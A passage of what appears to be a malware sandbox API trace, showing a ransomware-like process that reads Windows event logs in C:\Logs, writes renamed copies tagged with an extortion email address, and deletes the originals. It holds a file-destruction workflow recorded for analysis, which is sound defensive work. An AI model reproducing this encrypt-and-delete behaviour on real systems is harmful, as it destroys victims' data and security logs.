(lpString=".7z") returned 3 [0068.827] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.827] lstrlenW (lpString=".dbf") returned 4 [0068.827] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.827] lstrlenW (lpString=".1cd") returned 4 [0068.827] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.827] lstrlenW (lpString=".jpg") returned 4 [0068.827] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.827] lstrlenW (lpString=".doc") returned 4 [0068.827] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString=".docx") returned 5 [0068.827] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.827] lstrlenW (lpString=".pdf") returned 4 [0068.827] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString=".xls") returned 4 [0068.827] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString=".xlsx") returned 5 [0068.827] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.827] lstrlenW (lpString=".ppt") returned 4 [0068.827] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.827] lstrlenW (lpString=".zip") returned 4 [0068.828] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.828] lstrlenW (lpString=".rar") returned 4 [0068.828] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.828] lstrlenW (lpString=".bz2") returned 4 [0068.828] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.828] lstrlenW (lpString=".7z") returned 3 [0068.828] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.828] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.828] lstrlenW (lpString=".dbf") returned 4 [0068.828] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.828] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.828] lstrlenW (lpString=".1cd") returned 4 [0068.828] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.828] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.828] lstrlenW (lpString=".jpg") returned 4 [0068.828] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.828] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.828] lstrlenW (lpString="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 57 [0068.828] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.829] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0068.829] CloseHandle (hObject=0x354) returned 1 [0068.829] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 0x20 [0068.829] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.829] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.829] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.829] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.830] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0068.830] GetLastError () returned 0x0 [0068.830] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.832] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.835] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.835] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x146, lpOverlapped=0x0) returned 1 [0068.835] SetEndOfFile (hFile=0x32c) returned 1 [0068.835] CloseHandle (hObject=0x32c) returned 1 [0068.836] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.836] SetEndOfFile (hFile=0x354) returned 1 [0068.837] CloseHandle (hObject=0x354) returned 1 [0068.837] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.837] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 1 [0068.837] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.837] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.837] lstrlenW (lpString=".doc") returned 4 [0068.837] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.837] lstrlenW (lpString=".docx") returned 5 [0068.837] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.837] lstrlenW (lpString=".pdf") returned 4 [0068.837] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.837] lstrlenW (lpString=".xls") returned 4 [0068.837] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.837] lstrlenW (lpString=".xlsx") returned 5 [0068.837] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.837] lstrlenW (lpString=".ppt") returned 4 [0068.838] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.838] lstrlenW (lpString=".zip") returned 4 [0068.838] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString=".rar") returned 4 [0068.838] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString=".bz2") returned 4 [0068.838] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString=".7z") returned 3 [0068.838] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.838] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.838] lstrlenW (lpString=".dbf") returned 4 [0068.838] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.838] lstrlenW (lpString=".1cd") returned 4 [0068.838] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.838] lstrlenW (lpString=".jpg") returned 4 [0068.838] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.838] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.838] lstrlenW (lpString=".doc") returned 4 [0068.838] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString=".docx") returned 5 [0068.838] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.838] lstrlenW (lpString=".pdf") returned 4 [0068.838] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString=".xls") returned 4 [0068.838] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.838] lstrlenW (lpString=".xlsx") returned 5 [0068.838] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.838] lstrlenW (lpString=".ppt") returned 4 [0068.839] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.839] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.839] lstrlenW (lpString=".zip") returned 4 [0068.839] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.839] lstrlenW (lpString=".rar") returned 4 [0068.839] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.839] lstrlenW (lpString=".bz2") returned 4 [0068.839] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.839] lstrlenW (lpString=".7z") returned 3 [0068.839] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.839] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.839] lstrlenW (lpString=".dbf") returned 4 [0068.839] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.839] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.839] lstrlenW (lpString=".1cd") returned 4 [0068.839] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.839] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0068.839] lstrlenW (lpString=".jpg") returned 4 [0068.839] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.839] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.839] lstrlenW (lpString="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 42 [0068.839] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.840] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0068.840] CloseHandle (hObject=0x354) returned 1 [0068.840] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 0x20 [0068.840] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.840] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.840] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.840] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.840] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0068.841] GetLastError () returned 0x0 [0068.841] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0069.453] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0069.454] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.454] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x128, lpOverlapped=0x0) returned 1 [0069.455] SetEndOfFile (hFile=0x32c) returned 1 [0069.455] CloseHandle (hObject=0x32c) returned 1 [0069.455] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.455] SetEndOfFile (hFile=0x354) returned 1 [0069.466] CloseHandle (hObject=0x354) returned 1 [0069.466] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.466] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 1 [0069.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.467] lstrlenW (lpString=".doc") returned 4 [0069.467] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString=".docx") returned 5 [0069.467] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.467] lstrlenW (lpString=".pdf") returned 4 [0069.467] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString=".xls") returned 4 [0069.467] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString=".xlsx") returned 5 [0069.467] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.467] lstrlenW (lpString=".ppt") returned 4 [0069.467] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.467] lstrlenW (lpString=".zip") returned 4 [0069.467] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString=".rar") returned 4 [0069.467] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString=".bz2") returned 4 [0069.467] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString=".7z") returned 3 [0069.467] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.467] lstrlenW (lpString=".dbf") returned 4 [0069.467] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.467] lstrlenW (lpString=".1cd") returned 4 [0069.467] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.467] lstrlenW (lpString=".jpg") returned 4 [0069.467] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.468] lstrlenW (lpString=".doc") returned 4 [0069.468] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString=".docx") returned 5 [0069.468] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.468] lstrlenW (lpString=".pdf") returned 4 [0069.468] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString=".xls") returned 4 [0069.468] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString=".xlsx") returned 5 [0069.468] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.468] lstrlenW (lpString=".ppt") returned 4 [0069.468] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.468] lstrlenW (lpString=".zip") returned 4 [0069.468] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString=".rar") returned 4 [0069.468] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString=".bz2") returned 4 [0069.468] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString=".7z") returned 3 [0069.468] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.468] lstrlenW (lpString=".dbf") returned 4 [0069.468] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.468] lstrlenW (lpString=".1cd") returned 4 [0069.468] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0069.468] lstrlenW (lpString=".jpg") returned 4 [0069.468] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.469] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0069.469] lstrlenW (lpString="Security.evtx") returned 13 [0069.469] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0069.469] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=1118208) returned 1 [0069.469] CloseHandle (hObject=0x354) returned 1 [0069.469] GetFileAttributesW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx")) returned 0x20 [0069.469] GetFileAttributesW (lpFileName="C:\\Logs\\Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\security.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0069.469] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0069.469] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.469] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.469] CreateFileW (lpFileName="C:\\Logs\\Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\security.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0069.470] GetLastError () returned 0x0 [0069.470] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0069.488] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0070.113] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11010, lpOverlapped=0x0) returned 1 [0070.121] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11020, lpOverlapped=0x0) returned 1 [0070.168] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.168] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xee, lpOverlapped=0x0) returned 1 [0070.168] SetEndOfFile (hFile=0x32c) returned 1 [0070.168] CloseHandle (hObject=0x32c) returned 1 [0070.168] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.168] SetEndOfFile (hFile=0x354) returned 1 [0070.169] CloseHandle (hObject=0x354) returned 1 [0070.170] SetFileAttributesW (lpFileName="C:\\Logs\\Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0070.170] DeleteFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx")) returned 1 [0070.170] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.170] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.170] lstrlenW (lpString=".doc") returned 4 [0070.170] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0070.170] lstrlenW (lpString=".docx") returned 5 [0070.170] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0070.170] lstrlenW (lpString=".pdf") returned 4 [0070.170] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0070.170] lstrlenW (lpString=".xls") returned 4 [0070.170] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0070.170] lstrlenW (lpString=".xlsx") returned 5 [0070.170] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0070.170] lstrlenW (lpString=".ppt") returned 4 [0070.170] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0070.170] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.170] lstrlenW (lpString=".zip") returned 4 [0070.170] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0070.170] lstrlenW (lpString=".rar") returned 4 [0070.170] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0070.170] lstrlenW (lpString=".bz2") returned 4 [0070.171] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString=".7z") returned 3 [0070.171] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0070.171] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.171] lstrlenW (lpString=".dbf") returned 4 [0070.171] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.171] lstrlenW (lpString=".1cd") returned 4 [0070.171] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.171] lstrlenW (lpString=".jpg") returned 4 [0070.171] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.171] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.171] lstrlenW (lpString=".doc") returned 4 [0070.171] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString=".docx") returned 5 [0070.171] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0070.171] lstrlenW (lpString=".pdf") returned 4 [0070.171] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString=".xls") returned 4 [0070.171] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString=".xlsx") returned 5 [0070.171] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0070.171] lstrlenW (lpString=".ppt") returned 4 [0070.171] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.171] lstrlenW (lpString=".zip") returned 4 [0070.171] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString=".rar") returned 4 